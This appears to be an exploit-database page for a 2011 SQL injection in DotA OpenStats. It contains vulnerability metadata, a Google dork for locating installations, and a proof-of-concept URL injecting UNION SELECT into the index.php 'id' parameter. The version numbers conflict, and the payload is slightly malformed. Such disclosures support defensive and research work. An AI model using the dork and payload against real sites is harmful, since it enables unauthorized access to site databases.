header-logo
Suggest Exploit
vendor:
DotA OpenStats
by:
HvM17
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DotA OpenStats
Affected Version From: 1.3.2009
Affected Version To: 1.3.2009
Patch Exists: NO
Related CWE: N/A
CPE: openstats.iz.rs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP
2011

DotA OpenStats SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in DotA OpenStats version 1.3.9 and below to gain unauthorized access to the application. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can send a malicious HTTP request containing a specially crafted SQL statement to the vulnerable script and execute arbitrary code in the application's database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit
		
		http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
		
============
Made IN INDONESIA
Greetz for All HVM crew :)
============